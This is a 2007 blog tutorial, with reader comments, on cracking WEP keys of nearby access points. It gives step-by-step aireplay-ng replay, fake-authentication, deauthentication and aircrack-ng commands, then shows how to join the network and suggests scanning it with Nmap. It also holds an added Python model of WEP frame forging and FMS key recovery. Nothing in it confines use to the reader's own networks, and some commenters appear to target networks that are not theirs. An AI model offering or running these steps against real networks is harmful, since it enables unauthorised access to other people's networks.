Hacking WEP With Fake Authentication + Video

January 8th, 2007 - By:  Anthony D.

Comments (18)

Video Demonstration: Hacking WEP

This is a tutorial on how to crack Wired Equivalent Privacy (WEP), whether the key is 64-bit or 128-bit. Whether or not there are clients connected to the target Access Point (AP) decides which method you need to use to generate wireless traffic. If you are looking for a Linux distribution that contains all of the tools needed for this, I would highly recommend Back|Track 2. Not only does it contain hundreds of open source tools, but it is also based on the Slax Live CD, which has excellent modularity. To sniff for wireless networks and capture packets you can use a variety of different applications, but the most widely used are Airodump and Kismet. I suggest using Airodump, since it is part of the Aircrack suite and is what I will be using in this tutorial.

I will describe two different methods of generating wireless traffic. The first assumes that there is at least one client connected to the AP and the second assumes that there are no clients connected to the AP. The first method works by capturing a packet that a connected client sends to the AP and having your machine resend that same packet to the AP hundreds of times a second. WEP has no replay protection, so the AP accepts the replayed packet every time and forwards it; an ARP request is the ideal packet, because the AP rebroadcasts it and each rebroadcast is encrypted with a fresh Initialization Vector (IV), the 24-bit value prepended to every WEP frame that seeds the RC4 cipher. Those fresh IVs are what the key recovery feeds on. The second method works by sending fake authentication packets to the AP every thirty seconds, so that the AP treats your card as an associated client. Once you are associated, you send Address Resolution Protocol (ARP) requests to the AP hundreds of times a second while deauthenticating and reauthenticating yourself.

Now, let us get started. I'm going to assume that you have a laptop or desktop with a wireless card capable of injecting packets and have Back|Track 2 running. Log in as root with the password toor. Then run xconf to configure the Graphical User Interface (GUI) for your video card and startx to start KDE. Once you are in KDE, open a console and run iwconfig to make sure that Back|Track 2 has detected your wireless card. The output will vary depending on your wireless card and driver. My output is as follows:

lo no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"Linksys"
Mode:Managed Frequency:2.442 GHz Access Point: 00:06:25:9A:50:C8
Bit Rate:54 Mb/s Tx-Power:18 dBm Sensitivity=187/255
Retry min limit:7 RTS thr:off
Power Management:off
Link Quality=54/100 Signal level=39/100 Noise level=1/100
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
sit0 no wireless extensions.

If Back|Track 2 did not detect your wireless card, you may try loading different drivers or downloading and installing them manually. Now let us set the wireless card to Monitor mode, which will enable us to discover Access Points, sniff wireless traffic, and inject packets. Depending on your wireless card and driver you may have to use either the first or the second set of commands. Also, throughout the tutorial you may have to change the wireless interface in the commands, such as ath0 to wlan0, and so on. The commands are as follows:

ifconfig ath0 down
iwconfig ath0 mode monitor channel 6
ifconfig ath0 up

- or -

ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ifconfig ath0 up

Now that your wireless card is in Monitor mode we can start Airodump. Airodump will allow us to sniff wireless traffic and log it to a file, which we will later run through Aircrack. The following command will start Airodump on channel six, write the captured IVs to output-01.ivs (Airodump numbers the files it creates from the prefix you give it), and run on the wireless interface ath0. If you would prefer to scan all channels and all frequencies, you can add the --abg option to the command before the wireless interface. If you do opt to do that, be sure to exit Airodump once you have found the channel the AP is on, then run Airodump again with the channel set to that of the AP. This keeps your card locked on the AP's channel instead of hopping, which is required for the injection in the next step to work. The command is as follows:

airodump-ng --channel 6 --write output --ivs ath0

Now that Airodump is running in that console, we need to open a new tab or console. Once that is done we will start Aireplay, which is also a tool found in the Aircrack suite. This is the point where you must use either the first or the second method. If the AP has at least one client connected, use the first method. If the first method does not work or there are no clients connected to the AP, use the second method.

First Method:

If the AP has at least one client connected, you want to use this method. The following command will replay a captured packet to the AP at up to five hundred and twelve packets per second, using the client's Media Access Control (MAC) Address of 00:06:25:B3:D6:E2 as the source and the AP's MAC Address of 00:06:25:9A:50:C8 as the BSSID, on the wireless interface ath0. The captured packet was encrypted under the real key, it carries its own IV, and WEP does not detect replays, so the AP accepts it as coming from the legitimate client and forwards it every time, each time with a fresh IV. Edit the AP MAC Address, client MAC Address, and wireless interface to suit your needs. The command is as follows:

aireplay-ng --interactive -b 00:06:25:9A:50:C8 -h 00:06:25:B3:D6:E2 -x 512 ath0

Once Aireplay finds a packet it will prompt you to either use that packet or search for a new one. A packet whose source is the client's MAC Address, whose BSSID is the AP and whose destination is the broadcast address (FF:FF:FF:FF:FF:FF) is the best bet: a short broadcast packet from a client is almost always an ARP request, which the AP will rebroadcast. You may have to try several packets before you find one that generates wireless traffic, but eventually you should find one. That's all for the first method. If Airodump is rapidly capturing data then you may move on to the Aircrack portion of this tutorial. Once again, if the first method did not work then you may try the second method, but you have a better chance of success if there is at least one client connected.

Second Method:

If the first method does not work or there are no clients connected to the AP, you want to use this method. The first command will fake authenticate every thirty seconds, using the fake client MAC Address 00:06:25:C1:E5:37, to the AP with the MAC Address of 00:06:25:9A:50:C8 and Service Set Identifier (SSID) of Linksys on the wireless interface ath0. Edit the SSID, AP MAC Address, fake client MAC Address, and wireless interface to suit your needs. The commands must be run in this order for them to work properly. The first command is as follows:

aireplay-ng --fakeauth 30 -e Linksys -a 00:06:25:9A:50:C8 -h 00:06:25:C1:E5:37 ath0

The second command will listen for ARP requests and replay them to the AP with the MAC Address of 00:06:25:9A:50:C8 at up to five hundred and twelve packets per second, using the fake client MAC Address of 00:06:25:C1:E5:37 as the source, on the wireless interface ath0. The second command is as follows:

aireplay-ng --arpreplay -b 00:06:25:9A:50:C8 -h 00:06:25:C1:E5:37 -x 512 ath0

The third command will send five rounds of deauthentication packets aimed at the fake client MAC Address of 00:06:25:C1:E5:37 (-c) on the AP with the MAC Address of 00:06:25:9A:50:C8 (-a), on the wireless interface ath0. The fake authentication running in the first console then re-associates you. The third command is as follows:

aireplay-ng --deauth 5 -a 00:06:25:9A:50:C8 -c 00:06:25:C1:E5:37 ath0

From this point on it does not matter which method you used to generate wireless traffic, as long as the Data column in Airodump is rising quickly. As a rule of thumb, a 64-bit WEP key can be recovered from about 250,000 captured IVs and a 128-bit key from about 500,000. Aircrack does not brute force the key; it exploits statistical weaknesses in the way WEP feeds the IV and the key into RC4, which is why the number of distinct IVs matters more than the raw packet count. Now that we have Airodump capturing wireless packets and Aireplay generating wireless traffic, we can start Aircrack. The following command will run Aircrack on output-01.ivs and search for the AP MAC Address of 00:06:25:9A:50:C8 using the default fudge factor of two. When we ran Airodump we gave it the prefix output, but because Airodump automatically numbers its output files, the capture is written to output-01.ivs, then output-02.ivs, and so on.

A couple of other options are -f for the fudge factor and -n for the WEP key length. The fudge factor controls how many lower-scoring key byte candidates Aircrack is willing to backtrack over before giving up, so a higher value is more thorough but takes longer. The default is two, but if you have a sufficient amount of data captured, such as 750,000 IVs, and the key is still not found after a few minutes, you may want to raise the fudge factor to four or run two instances of Aircrack using different fudge factors. Usually you do not have to set the key length, but if you happen to know it, setting it narrows the search. The most common WEP key lengths are 64-bit and 128-bit. Note that the -z (PTW) attack added in later Aircrack releases needs far fewer IVs but works on whole packets, so it requires a .cap capture rather than the --ivs file used here. The command is as follows:

aircrack-ng -b 00:06:25:9A:50:C8 output-01.ivs

Once Airodump has captured enough data and Aircrack has recovered the key, Aircrack will print Key Found and display the WEP key. The time it takes depends on the WEP key length, how much data was captured, and the processing power of your laptop or desktop. I have had times where I captured over one million packets and ran two instances of Aircrack using fudge factors of two and four, but it still took thirty minutes to brute force the key. Then again, I have had times where I captured less than 200,000 packets and brute forced the WEP key in under five minutes. The average time for an average WEP key should be about ten to fifteen minutes. My Aircrack output is as follows:

Key Found! [ 40:39:19:87:08 ]
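To make concrete what Aireplay is replaying and what Aircrack is doing with the IVs, here is a small Python model added to this page; it is not code from the original post or from the Aircrack suite. It models a WEP frame as RC4(IV || key) over the payload plus a CRC-32 ICV, shows that anyone who knows one frame's plaintext (every ARP frame starts with the LLC/SNAP header AA AA 03 00 00 00 08 06) recovers that IV's keystream and can forge a different valid frame under it without the key, and then recovers a 5-byte key from a constructed capture using the FMS weak-IV statistics together with a fudge-factor search like Aircrack's. The key 40:39:19:87:08 is the one found above, reused as the toy network's key; the ARP request contents, the 1,280 weak IVs of the form (A+3, 255, X), and the cap of four candidates per key byte are assumptions of this example. A real capture is mostly non-weak IVs, which is why the tutorial needs hundreds of thousands of packets where the toy gets by with a few thousand.

```python
"""Toy WEP: RC4(IV || key) plus CRC-32 ICV, keystream reuse, and FMS key recovery.
Added example; not code from the original post or from the Aircrack suite."""
import zlib
from collections import Counter
from typing import Optional

# Every ARP frame starts with this LLC/SNAP header, so its first plaintext
# byte (0xAA) is known to the attacker. The ARP fields after it are constructed.
SNAP_ARP = bytes.fromhex("aaaa030000000806")
ARP_REQUEST = SNAP_ARP + bytes.fromhex(
    "0001080006040001" "000625b3d6e2" "c0a80164" "000000000000" "c0a80101")
KEY = bytes.fromhex("4039198708")  # the key found above, as the toy network's key


def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 key scheduling (KSA) followed by n bytes of keystream (PRGA)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, no secret involved."""
    return zlib.crc32(payload).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """3-byte IV in the clear, then RC4(iv || key) over payload || ICV."""
    plain = payload + icv(payload)
    return iv + xor(plain, rc4_keystream(iv + key, len(plain)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Payload if the ICV verifies under key, else None (wrong key)."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    return plain[:-4] if icv(plain[:-4]) == plain[-4:] else None


def forge_same_iv(frame: bytes, known_payload: bytes, new_payload: bytes) -> bytes:
    """Known plaintext yields this IV's keystream; WEP rejects neither a reused
    IV nor a replayed frame, so a new valid frame is forged without the key."""
    keystream = xor(frame[3:], known_payload + icv(known_payload))
    new = new_payload + icv(new_payload)
    assert len(new) <= len(keystream), "only as much keystream as was recovered"
    return frame[:3] + xor(new, keystream)


def capture(key: bytes, payload: bytes) -> list:
    """Constructed capture: one ARP frame under each FMS weak IV (A+3, 255, X).
    In a real capture these weak IVs are a tiny fraction of all IVs seen."""
    return [wep_encrypt(key, bytes([a + 3, 255, x]), payload)
            for a in range(len(key)) for x in range(256)]


def fms_votes(prefix: bytes, frames: list) -> Counter:
    """FMS: run the first 3+len(prefix) KSA steps with IV || recovered bytes.
    For a 'resolved' IV the first keystream byte z (ciphertext XOR 0xAA) leaks
    the next key byte with probability about 5%; other IVs only add noise."""
    i, votes = 3 + len(prefix), Counter()
    for frame in frames:
        k, s, j = frame[:3] + prefix, list(range(256)), 0
        for n in range(i):
            j = (j + s[n] + k[n]) & 0xFF
            s[n], s[j] = s[j], s[n]
        x = s[1]
        if x < i and (x + s[x]) & 0xFF == i:
            z = frame[3] ^ SNAP_ARP[0]
            votes[(s.index(z) - j - s[i]) & 0xFF] += 1
    return votes


def crack(frames: list, keylen: int, fudge: float = 2.0,
          prefix: bytes = b"") -> Optional[bytes]:
    """Aircrack-style search: depth first over candidates with votes >= best/fudge
    (at most four per byte here); a full key is accepted only if it verifies the
    ICV of a captured frame, so a wrong candidate never counts as 'Key Found'."""
    if len(prefix) == keylen:
        return prefix if wep_decrypt(prefix, frames[0]) is not None else None
    votes = fms_votes(prefix, frames)
    best = max(votes.values(), default=0)
    for byte, v in votes.most_common(4):
        if v * fudge < best:
            break
        found = crack(frames, keylen, fudge, prefix + bytes([byte]))
        if found is not None:
            return found
    return None


if __name__ == "__main__":
    frames = capture(KEY, ARP_REQUEST)
    forged = forge_same_iv(frames[0], ARP_REQUEST, b"forged payload, same IV, no key")
    print("forged frame accepted:", wep_decrypt(KEY, forged) is not None)
    print("Key Found! [", ":".join(f"{b:02X}" for b in crack(frames, len(KEY))), "]")
```

Raising fudge widens the search the same way -f does in aircrack-ng, and the ICV check on a captured frame is the only thing that turns a candidate into a confirmed key; with no fudge at all, a single unlucky byte would end the search.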

Now we must connect to the AP using the recovered WEP key. The following commands will set your wireless card to Managed mode, connect to the AP with the SSID of Linksys on channel six, and use 40:39:19:87:08 as the WEP key. Once again, depending on your wireless card and driver you may have to use either the first or the second set of commands. Also, if you would like to connect to the AP from Windows you must leave out the colons in the WEP key. The commands are as follows:

ifconfig ath0 down
iwconfig ath0 mode managed essid Linksys channel 6 key 40:39:19:87:08
ifconfig ath0 up

- or -

ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 essid Linksys channel 6 key 40:39:19:87:08
ifconfig ath0 up

Now we should be connected to the AP, but we need to be assigned an Internet Protocol (IP) Address. We will use the Dynamic Host Configuration Protocol (DHCP) to be leased an IP Address with a Domain Name System (DNS) Server. The following command will run the DHCP Client on the wireless interface ath0. The command is as follows:

dhcpcd ath0

If the AP or Router is not running DHCP we can manually set the IP Address, Subnet Mask, Default Gateway, and DNS Server. The following commands will assign the wireless interface ath0 an IP Address of 192.168.1.105, with a Subnet Mask of 255.255.255.0, a Default Gateway of 192.168.1.1, and write the DNS Server 4.2.2.1 to /etc/resolv.conf. The commands are as follows:

ifconfig ath0 down
ifconfig ath0 192.168.1.105 netmask 255.255.255.0
ifconfig ath0 up
route add default gw 192.168.1.1 ath0
echo nameserver 4.2.2.1 > /etc/resolv.conf

Finally, we test our connectivity to make sure that we are successfully connected to the AP and Internet. The command is as follows:

ping cyber-knowledge.net

The output of that command should be as follows:

PING cyber-knowledge.net (66.79.165.146) 56(84) bytes of data.
64 bytes from techreads.cyber-knowledge.net (66.79.165.146): icmp_seq=1 ttl=48 time=78.6 ms
64 bytes from techreads.cyber-knowledge.net (66.79.165.146): icmp_seq=2 ttl=48 time=77.6 ms
64 bytes from techreads.cyber-knowledge.net (66.79.165.146): icmp_seq=3 ttl=48 time=77.6 ms
--- cyber-knowledge.net ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2014ms

If everything went as planned then you should be connected to the AP and Internet. After that it is up to you to decide what you want to do, but I would suggest running Nmap to discover what is on the network. If you would like to view a video demonstration of this tutorial you can find it here. Also, if you do use this tutorial, please comment on how your experience with it went. Have a great time and remember, be responsible.

Resources:
Hacking WEP
Aircrack Suite
Back|Track 2
Kismet
Nmap
Slax Live CD

    • 1. newb  |  March 7th, 2007 @ 7:13 AM

      Best tutorial I’ve found. Simple, concise, current and it works! And the video to boot. Love your work

    • 2. kav  |  March 18th, 2007 @ 11:25 PM

      How can you fake your IP? I use the second method and when I input a fake IP, it returns a message saying "Notice: got a deauth/disassoc packet. Is the source MAC associated ?". I re-associate it but nothing happens and all the commands hang. What can I do? Is the fake IP a random one?

    • 3. Anthony D.  |  March 21st, 2007 @ 3:07 AM

      The only part an Internet Protocol (IP) Address is needed is when you have actually cracked the Key to the Access Point (AP) and are ready to connect. In either method you use a Media Access Control (MAC) Address, which is permanently fixated on your Network Interface Card (NIC). Aireplay is using the spoofed MAC Address to send to the AP, technically you can use any MAC Address you prefer as long as it is Hexadecimal. When you have cracked the Key to the AP, then you should use DHCP or configure your IP manually. DHCP will usually work, but on a network without DHCP you may have to manually configure it. Normally a home network will be 192.168.1.1 or 192.168.0.1, but almost always the Subnet Mask will be 255.255.255.0 as in Class C. I hope this helps. If not, post a reply comment and I will try to steer you in the right direction.

    • 4. Alan  |  May 22nd, 2007 @ 4:49 PM

      Worked for me w/my linksys WUSB54GC. I used method one, but couldn’t find an appropriate packet; method two worked in about ten whole minutes. Only oddity was that iwconfig wanted my adapter UP (not down) before it would put it into monitor mode. Seemed strange to me, but maybe this was because it had already associated itself with another network? Anyway, awesome, it works, etc.

    • 5. cam  |  June 17th, 2007 @ 9:14 PM

      I cannot seem to generate enough IVs. I am trying to crack a WEP key from an AP that recently had a client. I was able to gather a packet from the client before it went offline. I am sending the packet and in my airodump window I see the packet number going up, but the data number is going up very, very slowly. I have tried a fakeauth attack and it says sending authentication request about 5 or 6 times and comes back and says there is a problem. I have tried doing an arpreplay with aireplay and I can see the packets again going up, most of them are noted as being lost, and it says that I am receiving ARP requests, yet again very slowly going up, as well as the data. I have been doing this for over two hours, and I notice that in my aircrack window it says it's tried over 2 million keys and has got like 11,000 IVs. Am I doing something wrong, or does the AP have a MAC filter or block some other type of requests?

      Thanks for the help
      Cam

    • 6. dewa_eheem  |  July 17th, 2007 @ 6:09 PM

      how can we know the default Gateway????
      should I Ask the administrator first????

      if I was an admin, I wouldn’t set my IP with class C or without subnet

    • 7. Noob  |  July 29th, 2007 @ 12:57 AM

      I tried it and the authentication never went through for method 2. I'm receiving packets slow as a snail and at the rate I was going it was gonna take me at least 4 days to collect 250 packets for one 64-bit key.

      can someone give me some guidance?

    • 8. Allan  |  October 18th, 2007 @ 5:44 AM

      Any hardware required? Cause I am using an IPW2200BG, can it be done?

    • 9. monomena  |  November 6th, 2007 @ 7:41 PM

      I have a problem: when I try to authenticate, it starts but then it just stops, and says attack was unsuccessful, possible reasons:
      and it gives me some options, but I checked almost every one, so I don't know what to do. Sorry for the trouble, but can someone help me?

    • 10. CG  |  December 3rd, 2007 @ 1:32 PM

      Using the aircrack -z option should increase the cracking time significantly. I talked about it here:

      carnal0wna...ck-ng.html

    • 11. john  |  January 3rd, 2008 @ 10:56 AM

      Best beginners' tut I have seen so far. The only thing I would suggest is the -z option, as stated above, although in order to do so you must not include --ivs in the first step, because the PTW method will not accept the .iv, only .cap.

    • 12. M4  |  February 14th, 2008 @ 1:58 PM

      Good job!
      I’m confused with -h option. Is this my card mac address or any connected client mac address obtained with Kismet?

      The other question is about the interactive attack in the first method. Should the packet contain the AP MAC address as destination and the connected client (obtained with Kismet) as source?
      Thanks.

    • 13. peter  |  April 25th, 2008 @ 9:56 PM

      Hi there,
      I need your help because I would like to understand a strange case:
      0) AP seems to accept any key of length 10
      1) I cracked a WEP key and I got the key (using air..mon..dump…reply..crack )
      2) I tried DHCP and nothing
      3) I fixed the IP used by default by this vendor and mask 255.0.0.0 and nothing, neither with 192.168.0.1
      4) I made ping scanning for determining the router IP and nothing. I did it for all internal IP addresses, changing IP when needed!!!!

      This is about a wireless named WLAN_XX. I tried the same in 3 different WLANs WLAN_XX with the same result.

      I have not yet tried to change the MAC, but theoretically if MAC filtering were active the AP should reject my packets.

      Does anyone know what's going on?

      Thanks

    • 14. Gordon  |  May 12th, 2008 @ 1:01 AM

      Hello

      can wireless WEP still be hacked if there have never been clients connected?

    • 15. Anthony D.  |  May 19th, 2008 @ 5:22 PM

      Yes, WEP can still be broken on an AP even if clients have never been or are currently not connected. See method #2 where I discuss fake authentication and de-authentication.

    • 16. Shawn  |  July 19th, 2008 @ 3:48 AM

      I get this "Failed. Next try with 5000 IVs." by the time I get to aircrack-ng. What is it and how do I go about it?
      Thanks!

    • 17. tghazali  |  September 5th, 2008 @ 12:15 AM

      Hello, I’d really appreciate if you helped me out here :)

      I’m trying here to crack my home wireless network WEP key with no clients connected.

      I start airodump-ng, beacons keep increasing, but as soon as I associate successfully with fakeauth attack, beacons stop. After a while networks disappear from airodump, and running it again shows no networks.

      Any ideas??

    • 18. BluePlum  |  September 5th, 2008 @ 8:02 AM

      Hey, where do I find the second MAC address that's required?

      aireplay-ng --interactive -b 00:06:25:9A:50:C8 -h ---------> 00:06:25:B3:D6:E2 <--------- -x 512 ath0
